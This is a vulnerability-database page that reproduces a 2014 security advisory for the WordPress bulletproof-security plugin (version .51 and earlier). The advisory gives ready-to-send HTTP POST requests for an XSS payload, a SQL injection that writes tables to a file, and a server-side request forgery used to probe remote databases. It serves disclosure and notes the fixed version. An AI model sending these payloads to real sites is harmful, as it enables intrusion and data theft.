Lucene search
K

WordPress Bulletproof-Security .51 XSS / SQL Injection / SSRF

🗓️ 05 Nov 2014 00:00:00Reported by Pietro OlivaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 54 Views

WordPress bulletproof-security .51 XSS / SQL Injection / SSRF CVE-2014-7958, CVE-2014-7959, CVE-2014-874

Related
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress Bulletproof-Security .51 Multiple Vulnerabilities
6 Nov 201400:00
zdt
CVE
CVE-2014-7958
6 Nov 201415:00
cve
CVE
CVE-2014-7959
6 Nov 201415:00
cve
CVE
CVE-2014-8749
1 Dec 201415:00
cve
Cvelist
CVE-2014-7958
6 Nov 201415:00
cvelist
Cvelist
CVE-2014-7959
6 Nov 201415:00
cvelist
Cvelist
CVE-2014-8749
1 Dec 201415:00
cvelist
EUVD
EUVD-2014-7808
7 Oct 202500:30
euvd
EUVD
EUVD-2014-7809
7 Oct 202500:30
euvd
EUVD
EUVD-2014-8580
7 Oct 202500:30
euvd
Rows per page
`Vulnerability title: Wordpress bulletproof-security <=.51 multiple  
vulnerabilities  
Author: Pietro Oliva  
CVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749  
Vendor: AITpro  
Product: bulletproof-security  
Affected version: bulletproof-security <= .51  
Vulnerabilities fixed in version: .51.1  
  
Details:  
  
  
xss vulnerability (CVE-2014-7958):  
  
POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php  
HTTP/1.1  
  
dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account  
  
  
SQL injection vulnerability (CVE-2014-7959, correct db username and  
password is required in order to exploit this):  
  
POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php  
HTTP/1.1  
  
dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b+--+&username=&Login-Security-Unlock=Unlock+User+Account  
  
  
  
SSRF vulnerability (CVE-2014-8749)  
  
  
POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php  
HTTP/1.1  
dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account  
  
Possible scenario:  
  
- the user sends a request with username, password, host and other  
parameters to the vulnerable page  
- the server doesn't check the host parameter to be in a whitelist of  
permitted databases  
- the server performs an authentication request to a remote or  
internal network database and gives back to the attacker the  
authentication result  
-After n attemps the attacker has bypassed access restrictions (if  
any) to the remote database, discovered the remote database password,  
and made it appear bulletproof-security as the source of the attack.  
  
Extra step:  
-If the sql injection flaw (CVE-2014-7959) is not fixed, an attacker  
could also execute arbitrary sql statement on the remote server, as  
the vulnerable page executes a query if the authentication is  
successful (without filtering or use prepared statements). The source  
of the attack would appear to be the bulletproof-security vulnerable  
site.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation